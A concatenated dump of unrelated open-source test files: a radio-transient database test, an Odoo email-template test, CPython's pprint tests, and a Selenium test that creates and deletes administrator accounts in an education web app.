self.img_params[-1][k]*=rms_decrease_factor
def tearDown(self):
tkp.db.rollback()
def test_previous_image_id(self):
img_params = self.img_params
mock_sources=[]
mock_sources.append( MockSource(
example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
dec=img_params[0]['centre_decl']),
lightcurve={img_params[-1]['taustart_ts']:
self.always_detectable_flux}
))
mock_sources.append( MockSource(
example_extractedsource_tuple(ra=img_params[0]['centre_ra']+1,
dec=img_params[0]['centre_decl']),
lightcurve={img_params[-1]['taustart_ts']:
self.always_detectable_flux}
))
image_ids={}
for img_idx in xrange(self.n_images):
image, _,_ = insert_image_and_simulated_sources(
self.dataset,self.img_params[img_idx],mock_sources,
self.new_source_sigma_margin)
image_ids[img_idx]=image.id
newsources = get_newsources_for_dataset(self.dataset.id)
self.assertEqual(len(newsources),len(mock_sources))
newsource_properties = newsources[0]
print "Image IDs:", image_ids
self.assertEqual(newsource_properties['previous_limits_image'],
image_ids[4])
class TestMultipleSourceField(unittest.TestCase):
"""
By testing a field with multiple sources, we at least go some way
to ensuring there is no misclassification in the SQL queries
when we have multiple transient candidates in play.
"""
@requires_database()
def setUp(self):
self.database = tkp.db.Database()
self.dataset = tkp.db.DataSet(
data={'description':"Trans:" +self._testMethodName},
database=self.database)
self.n_images = 8
self.image_rms = 1e-3 # 1mJy
self.new_source_sigma_margin = 3
self.search_params = dict(eta_min=1,
v_min=0.1,
# minpoints=1,
)
detection_thresh=10
barely_detectable_flux = 1.01*self.image_rms*(detection_thresh)
reliably_detectable_flux = (
1.01*self.image_rms*(detection_thresh+self.new_source_sigma_margin))
test_specific_img_params = dict(rms_qc =self.image_rms,
rms_min = self.image_rms,
rms_max = self.image_rms,
detection_thresh = detection_thresh)
self.img_params = db_subs.generate_timespaced_dbimages_data(
self.n_images, **test_specific_img_params)
imgs=self.img_params
first_img = imgs[0]
centre_ra = first_img['centre_ra']
centre_decl = first_img['centre_decl']
xtr_radius = first_img['xtr_radius']
#At centre
fixed_source = MockSource(
example_extractedsource_tuple(ra=centre_ra, dec=centre_decl),
lightcurve=defaultdict(lambda: barely_detectable_flux))
#How many transients should we know about after each image?
self.n_transients_after_image = defaultdict(lambda:0)
self.n_newsources_after_image = defaultdict(lambda:0)
#shifted to +ve RA
bright_fast_transient = MockSource(
example_extractedsource_tuple(ra=centre_ra + xtr_radius * 0.5,
dec=centre_decl),
lightcurve={imgs[3]['taustart_ts']: reliably_detectable_flux}
)
#Detect immediately
for img_idx in range(3,self.n_images):
self.n_newsources_after_image[img_idx]+=1
#But only variable after non-detection
for img_idx in range(4,self.n_images):
self.n_transients_after_image[img_idx]+=1
# shifted to -ve RA
weak_fast_transient = MockSource(
example_extractedsource_tuple(ra=centre_ra - xtr_radius * 0.5,
dec=centre_decl),
lightcurve={imgs[3]['taustart_ts']: barely_detectable_flux}
)
# Not flagged as a newsource, could just be a weakly detected
# steady-source at first.
# But, shows high-variance after forced-fit in image[4]
for img_idx in range(4,self.n_images):
self.n_transients_after_image[img_idx]+=1
# shifted to +ve Dec
weak_slow_transient = MockSource(
example_extractedsource_tuple(ra=centre_ra,
dec=centre_decl + xtr_radius * 0.5),
lightcurve={imgs[5]['taustart_ts']: barely_detectable_flux,
imgs[6]['taustart_ts']: barely_detectable_flux*0.95}
)
# Not flagged as a newsource, could just be a weakly detected
# steady-source at first.
# Should not be flagged as transient until forced-fit in image[7]
for img_idx in range(7,self.n_images):
self.n_transients_after_image[img_idx]+=1
self.all_mock_sources = [fixed_source, weak_slow_transient,
bright_fast_transient, weak_fast_transient]
def tearDown(self):
tkp.db.rollback()
def test_full_transient_search_routine(self):
inserted_imgs = []
for img_idx in xrange(self.n_images):
image, _,_ = insert_image_and_simulated_sources(
self.dataset,self.img_params[img_idx],self.all_mock_sources,
self.new_source_sigma_margin)
inserted_imgs.append(image)
transients = get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
**self.search_params)
newsources = get_newsources_for_dataset(self.dataset.id)
self.assertEqual(len(transients),
self.n_transients_after_image[img_idx])
#Sanity check that everything went into one band
bands = frequency_bands(self.dataset._id)
self.assertEqual(len(bands), 1)
all_transients = get_sources_filtered_by_final_variability(
dataset_id=self.dataset.id, **self.search_params)
# for t in all_transients:
# print "V_int:", t['v_int'], " eta_int:", t['eta_int']
#Now test thresholding:
more_highly_variable = sum(t['v_int'] > 2.0 for t in all_transients)
very_non_flat = sum(t['eta_int'] > 100.0 for t in all_transients)
high_v_transients = get_sources_filtered_by_final_variability(
eta_min=1.1,
v_min=2.0,
dataset_id=self.dataset.id,
# minpoints=1
)
self.assertEqual(len(high_v_transients), more_highly_variable)
high_eta_transients = get_sources_filtered_by_final_variability(
eta_min=100,
v_min=0.01,
dataset_id=self.dataset.id,
# minpoints=1
)
self.assertEqual(len(high_eta_transients), very_non_flat)
| bsd-2-clause |
shaufi10/odoo | addons/email_template/tests/test_mail.py | 190 | 14322 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
from openerp.addons.mail.tests.common import TestMail
from openerp.tools import mute_logger
class test_message_compose(TestMail):
def setUp(self):
super(test_message_compose, self).setUp()
# create a 'pigs' and 'bird' groups that will be used through the various tests
self.group_bird_id = self.mail_group.create(self.cr, self.uid,
{'name': 'Bird', 'description': 'I am angry !'})
def test_00_message_compose_wizard(self):
""" Tests designed for the mail.compose.message wizard updated by email_template. """
cr, uid = self.cr, self.uid
mail_compose = self.registry('mail.compose.message')
self.res_users.write(cr, uid, [uid], {'signature': 'Admin', 'email': 'a@a.a'})
user_admin = self.res_users.browse(cr, uid, uid)
p_a_id = user_admin.partner_id.id
group_pigs = self.mail_group.browse(cr, uid, self.group_pigs_id)
group_bird = self.mail_group.browse(cr, uid, self.group_bird_id)
# Mail data
_subject1 = 'Pigs'
_subject2 = 'Bird'
_body_html1 = 'Fans of Pigs, unite !'
_body_html2 = 'I am angry !'
_attachments = [
{'name': 'First', 'datas_fname': 'first.txt', 'datas': base64.b64encode('My first attachment'), 'res_model': 'res.partner', 'res_id': self.partner_admin_id},
{'name': 'Second', 'datas_fname': 'second.txt', 'datas': base64.b64encode('My second attachment'), 'res_model': 'res.partner', 'res_id': self.partner_admin_id},
]
_attachments_test = [('first.txt', 'My first attachment'), ('second.txt', 'My second attachment')]
# Create template on mail.group, with attachments
group_model_id = self.registry('ir.model').search(cr, uid, [('model', '=', 'mail.group')])[0]
email_template = self.registry('email.template')
email_template_id = email_template.create(cr, uid, {
'model_id': group_model_id,
'name': 'Pigs Template',
'subject': '${object.name}',
'body_html': '${object.description}',
'user_signature': False,
'attachment_ids': [(0, 0, _attachments[0]), (0, 0, _attachments[1])],
'email_to': 'b@b.b, c@c.c',
'email_cc': 'd@d.d'
})
# ----------------------------------------
# CASE1: comment and save as template
# ----------------------------------------
# 1. Comment on pigs
compose_id = mail_compose.create(cr, uid,
{'subject': 'Forget me subject', 'body': '<p>Dummy body</p>'},
{'default_composition_mode': 'comment',
'default_model': 'mail.group',
'default_res_id': self.group_pigs_id,
'active_ids': [self.group_pigs_id, self.group_bird_id]})
compose = mail_compose.browse(cr, uid, compose_id)
# 2. Save current composition form as a template
mail_compose.save_as_template(cr, uid, [compose_id], context={'default_model': 'mail.group'})
# Test: email_template subject, body_html, model
last_template_id = email_template.search(cr, uid, [('model', '=', 'mail.group'), ('subject', '=', 'Forget me subject')], limit=1)[0]
self.assertTrue(last_template_id, 'email_template not found for model mail.group, subject Forget me subject')
last_template = email_template.browse(cr, uid, last_template_id)
self.assertEqual(last_template.body_html, '<p>Dummy body</p>', 'email_template incorrect body_html')
# ----------------------------------------
# CASE2: comment with template, save as template
# ----------------------------------------
# 1. Comment on pigs
context = {
'default_composition_mode': 'comment',
'default_model': 'mail.group',
'default_res_id': self.group_pigs_id,
'default_use_template': False,
'default_template_id': email_template_id,
'active_ids': [self.group_pigs_id, self.group_bird_id]
}
compose_id = mail_compose.create(cr, uid, {'subject': 'Forget me subject', 'body': 'Dummy body'}, context)
compose = mail_compose.browse(cr, uid, compose_id, context)
onchange_res = compose.onchange_template_id(email_template_id, 'comment', 'mail.group', self.group_pigs_id)['value']
onchange_res['partner_ids'] = [(4, partner_id) for partner_id in onchange_res.pop('partner_ids', [])]
onchange_res['attachment_ids'] = [(4, attachment_id) for attachment_id in onchange_res.pop('attachment_ids', [])]
compose.write(onchange_res)
compose.refresh()
message_pids = [partner.id for partner in compose.partner_ids]
partner_ids = self.res_partner.search(cr, uid, [('email', 'in', ['b@b.b', 'c@c.c', 'd@d.d'])])
# Test: mail.compose.message: subject, body, partner_ids
self.assertEqual(compose.subject, _subject1, 'mail.compose.message subject incorrect')
self.assertIn(_body_html1, compose.body, 'mail.compose.message body incorrect')
self.assertEqual(set(message_pids), set(partner_ids), 'mail.compose.message partner_ids incorrect')
# Test: mail.compose.message: attachments (owner has not been modified)
for attach in compose.attachment_ids:
self.assertEqual(attach.res_model, 'res.partner', 'mail.compose.message attachment res_model through templat was overriden')
self.assertEqual(attach.res_id, self.partner_admin_id, 'mail.compose.message attachment res_id incorrect')
self.assertIn((attach.datas_fname, base64.b64decode(attach.datas)), _attachments_test,
'mail.message attachment name / data incorrect')
# Test: mail.message: attachments
mail_compose.send_mail(cr, uid, [compose_id])
group_pigs.refresh()
message_pigs = group_pigs.message_ids[0]
for attach in message_pigs.attachment_ids:
self.assertEqual(attach.res_model, 'mail.group', 'mail.compose.message attachment res_model through templat was overriden')
self.assertEqual(attach.res_id, self.group_pigs_id, 'mail.compose.message attachment res_id incorrect')
self.assertIn((attach.datas_fname, base64.b64decode(attach.datas)), _attachments_test,
'mail.message attachment name / data incorrect')
# ----------------------------------------
# CASE3: mass_mail with template
# ----------------------------------------
# 1. Mass_mail on pigs and bird, with a default_partner_ids set to check he is correctly added
context = {
'default_composition_mode': 'mass_mail',
'default_notify': True,
'default_model': 'mail.group',
'default_res_id': self.group_pigs_id,
'default_template_id': email_template_id,
'default_partner_ids': [p_a_id],
'active_ids': [self.group_pigs_id, self.group_bird_id]
}
compose_id = mail_compose.create(cr, uid, {'subject': 'Forget me subject', 'body': 'Dummy body'}, context)
compose = mail_compose.browse(cr, uid, compose_id, context)
onchange_res = compose.onchange_template_id(email_template_id, 'mass_mail', 'mail.group', self.group_pigs_id)['value']
onchange_res['partner_ids'] = [(4, partner_id) for partner_id in onchange_res.pop('partner_ids', [])]
onchange_res['attachment_ids'] = [(4, attachment_id) for attachment_id in onchange_res.pop('attachment_ids', [])]
compose.write(onchange_res)
compose.refresh()
message_pids = [partner.id for partner in compose.partner_ids]
partner_ids = [p_a_id]
self.assertEqual(compose.subject, '${object.name}', 'mail.compose.message subject incorrect')
self.assertEqual(compose.body, '<p>${object.description}</p>', 'mail.compose.message body incorrect') # todo: check signature
self.assertEqual(set(message_pids), set(partner_ids), 'mail.compose.message partner_ids incorrect')
# 2. Post the comment, get created message
mail_compose.send_mail(cr, uid, [compose_id], {'default_res_id': -1, 'active_ids': [self.group_pigs_id, self.group_bird_id]})
group_pigs.refresh()
group_bird.refresh()
message_pigs = group_pigs.message_ids[0]
message_bird = group_bird.message_ids[0]
# Test: subject, body
self.assertEqual(message_pigs.subject, _subject1, 'mail.message subject on Pigs incorrect')
self.assertEqual(message_bird.subject, _subject2, 'mail.message subject on Bird incorrect')
self.assertIn(_body_html1, message_pigs.body, 'mail.message body on Pigs incorrect')
self.assertIn(_body_html2, message_bird.body, 'mail.message body on Bird incorrect')
# Test: partner_ids: p_a_id (default) + 3 newly created partners
# message_pigs_pids = [partner.id for partner in message_pigs.notified_partner_ids]
# message_bird_pids = [partner.id for partner in message_bird.notified_partner_ids]
# partner_ids = self.res_partner.search(cr, uid, [('email', 'in', ['b@b.b', 'c@c.c', 'd@d.d'])])
# partner_ids.append(p_a_id)
# self.assertEqual(set(message_pigs_pids), set(partner_ids), 'mail.message on pigs incorrect number of notified_partner_ids')
# self.assertEqual(set(message_bird_pids), set(partner_ids), 'mail.message on bird notified_partner_ids incorrect')
# ----------------------------------------
# CASE4: test newly introduced partner_to field
# ----------------------------------------
# get already-created partners back
p_b_id = self.res_partner.search(cr, uid, [('email', '=', 'b@b.b')])[0]
p_c_id = self.res_partner.search(cr, uid, [('email', '=', 'c@c.c')])[0]
p_d_id = self.res_partner.search(cr, uid, [('email', '=', 'd@d.d')])[0]
# modify template: use partner_to, use template and email address in email_to to test all features together
user_model_id = self.registry('ir.model').search(cr, uid, [('model', '=', 'res.users')])[0]
email_template.write(cr, uid, [email_template_id], {
'model_id': user_model_id,
'body_html': '${object.login}',
'email_to': '${object.email}, c@c.c',
'partner_to': '%i,%i' % (p_b_id, p_c_id),
'email_cc': 'd@d.d',
})
# patner by email + partner by id (no double)
send_to = [p_a_id, p_b_id, p_c_id, p_d_id]
# Generate messsage with default email and partner on template
mail_value = mail_compose.generate_email_for_composer(cr, uid, email_template_id, uid)
self.assertEqual(set(mail_value['partner_ids']), set(send_to), 'mail.message partner_ids list created by template is incorrect')
@mute_logger('openerp.models')
def test_10_email_templating(self):
""" Tests designed for the mail.compose.message wizard updated by email_template. """
cr, uid, context = self.cr, self.uid, {}
# create the email.template on mail.group model
group_model_id = self.registry('ir.model').search(cr, uid, [('model', '=', 'mail.group')])[0]
email_template = self.registry('email.template')
email_template_id = email_template.create(cr, uid, {
'model_id': group_model_id,
'name': 'Pigs Template',
'email_from': 'Raoul Grosbedon <raoul@example.com>',
'subject': '${object.name}',
'body_html': '${object.description}',
'user_signature': True,
'email_to': 'b@b.b, c@c.c',
'email_cc': 'd@d.d',
'partner_to': '${user.partner_id.id},%s,%s,-1' % (self.user_raoul.partner_id.id, self.user_bert.partner_id.id)
})
# not force send: email_recipients is not taken into account
msg_id = email_template.send_mail(cr, uid, email_template_id, self.group_pigs_id, context=context)
mail = self.mail_mail.browse(cr, uid, msg_id, context=context)
self.assertEqual(mail.subject, 'Pigs', 'email_template: send_mail: wrong subject')
self.assertEqual(mail.email_to, 'b@b.b, c@c.c', 'email_template: send_mail: wrong email_to')
self.assertEqual(mail.email_cc, 'd@d.d', 'email_template: send_mail: wrong email_cc')
self.assertEqual(
set([partner.id for partner in mail.recipient_ids]),
set((self.partner_admin_id, self.user_raoul.partner_id.id, self.user_bert.partner_id.id)),
'email_template: send_mail: wrong management of partner_to')
# force send: take email_recipients into account
email_template.send_mail(cr, uid, email_template_id, self.group_pigs_id, force_send=True, context=context)
sent_emails = self._build_email_kwargs_list
email_to_lst = [
['b@b.b', 'c@c.c'], ['Administrator <admin@yourcompany.example.com>'],
['Raoul Grosbedon <raoul@raoul.fr>'], ['Bert Tartignole <bert@bert.fr>']]
self.assertEqual(len(sent_emails), 4, 'email_template: send_mail: 3 valid email recipients + email_to -> should send 4 emails')
for email in sent_emails:
self.assertIn(email['email_to'], email_to_lst, 'email_template: send_mail: wrong email_recipients')
| agpl-3.0 |
jsteemann/arangodb | 3rdParty/V8-4.3.61/third_party/python_26/Lib/test/test_pprint.py | 55 | 24560 | import pprint
import test.test_support
import unittest
import test.test_set
try:
uni = unicode
except NameError:
def uni(x):
return x
# list, tuple and dict subclasses that do or don't overwrite __repr__
class list2(list):
pass
class list3(list):
def __repr__(self):
return list.__repr__(self)
class tuple2(tuple):
pass
class tuple3(tuple):
def __repr__(self):
return tuple.__repr__(self)
class dict2(dict):
pass
class dict3(dict):
def __repr__(self):
return dict.__repr__(self)
class QueryTestCase(unittest.TestCase):
def setUp(self):
self.a = range(100)
self.b = range(200)
self.a[-12] = self.b
def test_basic(self):
# Verify .isrecursive() and .isreadable() w/o recursion
verify = self.assert_
pp = pprint.PrettyPrinter()
for safe in (2, 2.0, 2j, "abc", [3], (2,2), {3: 3}, uni("yaddayadda"),
self.a, self.b):
# module-level convenience functions
verify(not pprint.isrecursive(safe),
"expected not isrecursive for %r" % (safe,))
verify(pprint.isreadable(safe),
"expected isreadable for %r" % (safe,))
# PrettyPrinter methods
verify(not pp.isrecursive(safe),
"expected not isrecursive for %r" % (safe,))
verify(pp.isreadable(safe),
"expected isreadable for %r" % (safe,))
def test_knotted(self):
# Verify .isrecursive() and .isreadable() w/ recursion
# Tie a knot.
self.b[67] = self.a
# Messy dict.
self.d = {}
self.d[0] = self.d[1] = self.d[2] = self.d
verify = self.assert_
pp = pprint.PrettyPrinter()
for icky in self.a, self.b, self.d, (self.d, self.d):
verify(pprint.isrecursive(icky), "expected isrecursive")
verify(not pprint.isreadable(icky), "expected not isreadable")
verify(pp.isrecursive(icky), "expected isrecursive")
verify(not pp.isreadable(icky), "expected not isreadable")
# Break the cycles.
self.d.clear()
del self.a[:]
del self.b[:]
for safe in self.a, self.b, self.d, (self.d, self.d):
# module-level convenience functions
verify(not pprint.isrecursive(safe),
"expected not isrecursive for %r" % (safe,))
verify(pprint.isreadable(safe),
"expected isreadable for %r" % (safe,))
# PrettyPrinter methods
verify(not pp.isrecursive(safe),
"expected not isrecursive for %r" % (safe,))
verify(pp.isreadable(safe),
"expected isreadable for %r" % (safe,))
def test_unreadable(self):
# Not recursive but not readable anyway
verify = self.assert_
pp = pprint.PrettyPrinter()
for unreadable in type(3), pprint, pprint.isrecursive:
# module-level convenience functions
verify(not pprint.isrecursive(unreadable),
"expected not isrecursive for %r" % (unreadable,))
verify(not pprint.isreadable(unreadable),
"expected not isreadable for %r" % (unreadable,))
# PrettyPrinter methods
verify(not pp.isrecursive(unreadable),
"expected not isrecursive for %r" % (unreadable,))
verify(not pp.isreadable(unreadable),
"expected not isreadable for %r" % (unreadable,))
def test_same_as_repr(self):
# Simple objects, small containers and classes that overwrite __repr__
# For those the result should be the same as repr().
# Ahem. The docs don't say anything about that -- this appears to
# be testing an implementation quirk. Starting in Python 2.5, it's
# not true for dicts: pprint always sorts dicts by key now; before,
# it sorted a dict display if and only if the display required
# multiple lines. For that reason, dicts with more than one element
# aren't tested here.
verify = self.assert_
for simple in (0, 0L, 0+0j, 0.0, "", uni(""),
(), tuple2(), tuple3(),
[], list2(), list3(),
{}, dict2(), dict3(),
verify, pprint,
-6, -6L, -6-6j, -1.5, "x", uni("x"), (3,), [3], {3: 6},
(1,2), [3,4], {5: 6, 7: 8},
tuple2((1,2)), tuple3((1,2)), tuple3(range(100)),
[3,4], list2([3,4]), list3([3,4]), list3(range(100)),
{5: 6, 7: 8}, dict2({5: 6}), dict3({5: 6}),
range(10, -11, -1)
):
native = repr(simple)
for function in "pformat", "saferepr":
f = getattr(pprint, function)
got = f(simple)
verify(native == got, "expected %s got %s from pprint.%s" %
(native, got, function))
def test_basic_line_wrap(self):
# verify basic line-wrapping operation
o = {'RPM_cal': 0,
'RPM_cal2': 48059,
'Speed_cal': 0,
'controldesk_runtime_us': 0,
'main_code_runtime_us': 0,
'read_io_runtime_us': 0,
'write_io_runtime_us': 43690}
exp = """\
{'RPM_cal': 0,
'RPM_cal2': 48059,
'Speed_cal': 0,
'controldesk_runtime_us': 0,
'main_code_runtime_us': 0,
'read_io_runtime_us': 0,
'write_io_runtime_us': 43690}"""
for type in [dict, dict2]:
self.assertEqual(pprint.pformat(type(o)), exp)
o = range(100)
exp = '[%s]' % ',\n '.join(map(str, o))
for type in [list, list2]:
self.assertEqual(pprint.pformat(type(o)), exp)
o = tuple(range(100))
exp = '(%s)' % ',\n '.join(map(str, o))
for type in [tuple, tuple2]:
self.assertEqual(pprint.pformat(type(o)), exp)
# indent parameter
o = range(100)
exp = '[ %s]' % ',\n '.join(map(str, o))
for type in [list, list2]:
self.assertEqual(pprint.pformat(type(o), indent=4), exp)
def test_nested_indentations(self):
o1 = list(range(10))
o2 = dict(first=1, second=2, third=3)
o = [o1, o2]
expected = """\
[ [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
{ 'first': 1,
'second': 2,
'third': 3}]"""
self.assertEqual(pprint.pformat(o, indent=4, width=42), expected)
def test_sorted_dict(self):
# Starting in Python 2.5, pprint sorts dict displays by key regardless
# of how small the dictionary may be.
# Before the change, on 32-bit Windows pformat() gave order
# 'a', 'c', 'b' here, so this test failed.
d = {'a': 1, 'b': 1, 'c': 1}
self.assertEqual(pprint.pformat(d), "{'a': 1, 'b': 1, 'c': 1}")
self.assertEqual(pprint.pformat([d, d]),
"[{'a': 1, 'b': 1, 'c': 1}, {'a': 1, 'b': 1, 'c': 1}]")
# The next one is kind of goofy. The sorted order depends on the
# alphabetic order of type names: "int" < "str" < "tuple". Before
# Python 2.5, this was in the test_same_as_repr() test. It's worth
# keeping around for now because it's one of few tests of pprint
# against a crazy mix of types.
self.assertEqual(pprint.pformat({"xy\tab\n": (3,), 5: [[]], (): {}}),
r"{5: [[]], 'xy\tab\n': (3,), (): {}}")
def test_subclassing(self):
o = {'names with spaces': 'should be presented using repr()',
'others.should.not.be': 'like.this'}
exp = """\
{'names with spaces': 'should be presented using repr()',
others.should.not.be: like.this}"""
self.assertEqual(DottedPrettyPrinter().pformat(o), exp)
def test_set_reprs(self):
self.assertEqual(pprint.pformat(set()), 'set()')
self.assertEqual(pprint.pformat(set(range(3))), 'set([0, 1, 2])')
self.assertEqual(pprint.pformat(frozenset()), 'frozenset()')
self.assertEqual(pprint.pformat(frozenset(range(3))), 'frozenset([0, 1, 2])')
cube_repr_tgt = """\
{frozenset([]): frozenset([frozenset([2]), frozenset([0]), frozenset([1])]),
frozenset([0]): frozenset([frozenset(),
frozenset([0, 2]),
frozenset([0, 1])]),
frozenset([1]): frozenset([frozenset(),
frozenset([1, 2]),
frozenset([0, 1])]),
frozenset([2]): frozenset([frozenset(),
frozenset([1, 2]),
frozenset([0, 2])]),
frozenset([1, 2]): frozenset([frozenset([2]),
frozenset([1]),
frozenset([0, 1, 2])]),
frozenset([0, 2]): frozenset([frozenset([2]),
frozenset([0]),
frozenset([0, 1, 2])]),
frozenset([0, 1]): frozenset([frozenset([0]),
frozenset([1]),
frozenset([0, 1, 2])]),
frozenset([0, 1, 2]): frozenset([frozenset([1, 2]),
frozenset([0, 2]),
frozenset([0, 1])])}"""
cube = test.test_set.cube(3)
self.assertEqual(pprint.pformat(cube), cube_repr_tgt)
cubo_repr_tgt = """\
{frozenset([frozenset([0, 2]), frozenset([0])]): frozenset([frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset([2]),
frozenset([0,
2])])]),
frozenset([frozenset([0, 1]), frozenset([1])]): frozenset([frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset([1]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([1])])]),
frozenset([frozenset([1, 2]), frozenset([1])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([1])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([1, 2]), frozenset([2])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([1]),
frozenset([1,
2])]),
frozenset([frozenset([2]),
frozenset([0,
2])]),
frozenset([frozenset(),
frozenset([2])])]),
frozenset([frozenset([]), frozenset([0])]): frozenset([frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset(),
frozenset([1])]),
frozenset([frozenset(),
frozenset([2])])]),
frozenset([frozenset([]), frozenset([1])]): frozenset([frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset([1]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([2])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([2]), frozenset([])]): frozenset([frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset(),
frozenset([1])]),
frozenset([frozenset([2]),
frozenset([0,
2])])]),
frozenset([frozenset([0, 1, 2]), frozenset([0, 1])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
1])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([0]), frozenset([0, 1])]): frozenset([frozenset([frozenset(),
frozenset([0])]),
frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset([1]),
frozenset([0,
1])])]),
frozenset([frozenset([2]), frozenset([0, 2])]): frozenset([frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset(),
frozenset([2])])]),
frozenset([frozenset([0, 1, 2]), frozenset([0, 2])]): frozenset([frozenset([frozenset([1,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0]),
frozenset([0,
2])]),
frozenset([frozenset([2]),
frozenset([0,
2])])]),
frozenset([frozenset([1, 2]), frozenset([0, 1, 2])]): frozenset([frozenset([frozenset([0,
2]),
frozenset([0,
1,
2])]),
frozenset([frozenset([0,
1]),
frozenset([0,
1,
2])]),
frozenset([frozenset([2]),
frozenset([1,
2])]),
frozenset([frozenset([1]),
frozenset([1,
2])])])}"""
cubo = test.test_set.linegraph(cube)
self.assertEqual(pprint.pformat(cubo), cubo_repr_tgt)
def test_depth(self):
nested_tuple = (1, (2, (3, (4, (5, 6)))))
nested_dict = {1: {2: {3: {4: {5: {6: 6}}}}}}
nested_list = [1, [2, [3, [4, [5, [6, []]]]]]]
self.assertEqual(pprint.pformat(nested_tuple), repr(nested_tuple))
self.assertEqual(pprint.pformat(nested_dict), repr(nested_dict))
self.assertEqual(pprint.pformat(nested_list), repr(nested_list))
lv1_tuple = '(1, (...))'
lv1_dict = '{1: {...}}'
lv1_list = '[1, [...]]'
self.assertEqual(pprint.pformat(nested_tuple, depth=1), lv1_tuple)
self.assertEqual(pprint.pformat(nested_dict, depth=1), lv1_dict)
self.assertEqual(pprint.pformat(nested_list, depth=1), lv1_list)
class DottedPrettyPrinter(pprint.PrettyPrinter):
def format(self, object, context, maxlevels, level):
if isinstance(object, str):
if ' ' in object:
return repr(object), 1, 0
else:
return object, 0, 0
else:
return pprint.PrettyPrinter.format(
self, object, context, maxlevels, level)
def test_main():
test.test_support.run_unittest(QueryTestCase)
if __name__ == "__main__":
test_main()
| apache-2.0 |
sysuwuhaibin/vatus | vatus/testcases/test_education/test_user_management/test_E139_delete_administrator.py | 1 | 5779 | # -*- coding: utf-8 -*-
import time
import unittest
from selenium import webdriver
import settings
class DeleteAdministrator(unittest.TestCase):
def setUp(self):
self.driver = None
self.base_url = settings.test_parameters.get("education_base_url")
def test_E139_delete_administrator(self):
web_types = settings.test_parameters.get("web_types")
for web_type in web_types:
if web_type == 'firefox':
self.driver = webdriver.Firefox()
elif web_type == 'chrome':
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
driver = self.driver
driver.get(self.base_url)
driver.maximize_window()
###########################################
# 前置条件:登录系统,创建测试数据
###########################################
driver.find_element_by_id("input_username").clear()
driver.find_element_by_id("input_username").send_keys(settings.test_parameters.get("admin_username"))
driver.find_element_by_id("input_password").clear()
driver.find_element_by_id("input_password").send_keys(settings.test_parameters.get("admin_password"))
driver.find_element_by_id("login_btn").click()
time.sleep(5)
driver.find_element_by_link_text(u"用户管理").click()
time.sleep(1)
driver.find_element_by_link_text(u"管理员").click()
time.sleep(3)
teacher_names = ['deleteadmin01','deleteadmin02','deleteadmin03','deleteadm04']
for teacher_name in teacher_names:
driver.find_element_by_id("create_user").click()
time.sleep(1)
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys(teacher_name)
driver.find_element_by_id("fullname").clear()
driver.find_element_by_id("fullname").send_keys(teacher_name)
driver.find_element_by_id("email").clear()
driver.find_element_by_id("email").send_keys(teacher_name+"@vinzor.com")
driver.find_element_by_id("password").clear()
driver.find_element_by_id("password").send_keys("123456")
driver.find_element_by_id("confirm").clear()
driver.find_element_by_id("confirm").send_keys("123456")
time.sleep(3)
driver.find_element_by_id("confirm_action").click()
time.sleep(5)
###########################################
# 步骤1:未勾选任何一条学生记录,点击“删除”按钮
###########################################
time.sleep(5)
driver.find_element_by_id("delete_users").click()
time.sleep(1)
self.assertEqual("请选择一个或多个要删除的用户", driver.find_element_by_class_name("gritter-without-image").
find_element_by_tag_name("p").text)
time.sleep(8)
###########################################
# 步骤2:多选删除
###########################################
driver.find_element_by_css_selector("input.form-control.input-sm").clear()
driver.find_element_by_css_selector("input.form-control.input-sm").send_keys("deleteadmin")
time.sleep(5)
if web_type == 'firefox':
driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
"div[2]/div[2]/div/table/thead/tr/th[1]/label/input").click()
elif web_type == 'chrome':
element = driver.find_element_by_xpath("/html/body/div[2]/div[2]/div/div/div[2]/"
"div[2]/div[2]/div/table/thead/tr/th[1]/label/input")
webdriver.ActionChains(driver).move_to_element(element).click().perform()
time.sleep(3)
